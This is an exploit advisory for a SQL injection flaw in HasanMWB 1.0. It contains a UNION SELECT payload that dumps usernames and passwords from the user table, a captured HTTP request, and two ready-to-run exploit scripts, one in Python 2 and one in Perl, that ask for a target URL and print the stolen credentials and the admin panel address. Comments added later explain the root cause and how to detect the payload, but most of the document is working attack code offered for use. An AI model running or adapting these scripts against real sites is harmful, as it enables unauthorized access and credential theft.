HasanMWB 1.0 - SQL Injection

2018-12-05 10:36:56

# Exploit Title: HasanMWB 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-12-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

#GET /PATH/index.php?hsn=category&id=11' union select 1,(SELECT GROUP_CONCAT(0x3c68323e,0x557365723a,username,0x2020,0x506173733a,password,0x3c2f68323e SEPARATOR 0x3c62723e) FROM user),3,4-- - HTTP/1.1
#Host: TARGET
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
#DNT: 1
#Connection: keep-alive
#Upgrade-Insecure-Requests: 1
#HTTP/1.1 200 OK
#Date: Wed, 05 Dec 2018 00:24:09 GMT
#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
#X-Powered-By: PHP/5.6.30
#Expires: Thu, 19 Nov 1981 08:52:00 GMT
#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
#Pragma: no-cache
#Content-Length: 2697
#Keep-Alive: timeout=5, max=100
#Connection: Keep-Alive
#Content-Type: text/html; charset=UTF-8

# POC:
# 1)
#index.php?hsn=page&id=[SQL] / $id = $_GET['id'];
#index.php?hsn=category&id=[SQL] / $id = $_GET['id'];
#index.php?hsn=search&q=[SQL] / $qu = $_GET['q'];
# Etc..

#!/usr/bin/python
# Python 2 only: the print statement, urllib2 and raw_input were all removed in Python 3.
import urllib2
import re

print """
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----
HasanMWB 1.0 - SQL Injection
Ihsan Sencan
---------------Ooooo----
( )
ooooO ) /
( ) (_/
\ (
\_)
"""

# Base URL typed by the user. The prompt expects a trailing "/", because the
# path and payload below are simply concatenated onto it with no separator.
s = raw_input("\nTarget:[http://localhost/[PATH]/] ")
# Affected endpoint: per the PoC notes above, hsn=category assigns $_GET['id']
# straight into the SQL statement (no cast, no bound parameter), so whatever
# follows id= becomes part of the query. The server-side fix is to bind `id`
# as an integer parameter / use a prepared statement.
e = ("index.php?hsn=category&id=1")
# Injected tail. The 0x.. literals are hex-encoded output markup (<h2>, "User:",
# "Pass:", <br>). Defender note: a query string containing "union select" and
# 0x.. literals like this is an easy pattern to alert on in access logs or a WAF.
p = ("1' union select 1,(SELECT GROUP_CONCAT(0x3c68323e,0x557365723a,username,0x2020,0x506173733a,password,0x3c2f68323e SEPARATOR 0x3c62723e) FROM user),3,4-- -")
# urlopen does not percent-encode its argument; s+e+p is sent as given. A
# connection failure or non-2xx status raises urllib2.URLError/HTTPError, and
# nothing here catches it, so the script would then exit with a traceback.
response = urllib2.urlopen(s+e+p)
c = response.read()
# `.` does not cross newlines (no re.DOTALL) and `.*` is greedy, so on a line
# holding several <h2> elements the capture runs from the first <h2> to the
# last </h2> on that line.
up = re.findall(r'<h2>(.*)</h2>', c)

# info() is an rfc822-style message object; indexing a header the server did
# not send raises KeyError rather than returning None -- TODO confirm on Py2.
print "Server: ", response.info()['server']
print (up)
print "Login Url:"+(s)+"panel.php"


#!/usr/bin/perl
sub clear{
    # Wipe the terminal before the banner: `cls` on Windows, `clear` elsewhere.
    my $command = ($^O eq 'MSWin32') ? 'cls' : 'clear';
    system($command);
}
# Defined just above; clears the screen before the banner is printed.
clear();

print "**************************\n";
print "HasanMWB 1.0 SQL Injection\n";
print "Ihsan Sencan\n";
print "**************************\n";

# `use` is compile-time, so placing it after the banner is fine. There is no
# `use strict`/`use warnings`: $E, $cc, $host, $res and $answer are package globals.
use LWP::UserAgent;
print "\nTarget:[http://localhost/[PATH]/] ";
# Base URL taken verbatim from STDIN. $E below starts with "/", so a trailing
# slash in the input produces "//index.php".
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";

# Request path carrying the PoC payload in the `id` parameter of hsn=category.
# Per the notes above, index.php assigns $_GET['id'] straight into the SQL
# statement with no cast or bound parameter, which is the root cause; the 0x..
# literals are hex-encoded output markup (<h2>, "User:", "Pass:", <br>).
# Defender note: the server-side fix is to bind `id` as an integer parameter;
# a query string containing "union select" and 0x.. literals like this one is
# straightforward to flag in access logs or a WAF.
$E="/index.php?hsn=category&id=1' union select 1,(SELECT GROUP_CONCAT(0x3c68323e,0x557365723a,username,0x2020,0x506173733a,password,0x3c2f68323e SEPARATOR 0x3c62723e) FROM user),3,4-- -";
# ->new returns an object (true) or throws, so this `or die` is unlikely to ever fire.
$cc = LWP::UserAgent->new() or die "Could not initialize browser\n";
# Fixed Firefox 45 User-Agent; the same string appears in the request transcript above.
$cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
# The "" concatenations are no-ops; this is just $target . $E.
$host = $target . "".$E."";
# HTTP::Request is loaded by LWP::UserAgent, so no explicit `use` is needed.
# The HTTP status is never checked ($res->is_success is not consulted), so a
# 404/500 body is scanned exactly like a 200 body.
$res = $cc->request(HTTP::Request->new(GET=>$host));
# Non-greedy, first <h2>...</h2> only (scalar-context match). $1 is read two
# lines later, before any other match could clobber it.
$answer = $res->content; if ($answer =~/<h2>(.*?)<\/h2>/){
print "[+] Success !!!\n";
print "\n[+] Detail : $1\n";
print "$target/panel.php";
print "\n";
}
# No <h2> element in the response body.
else{print "\n[-]Not found.\n";
}
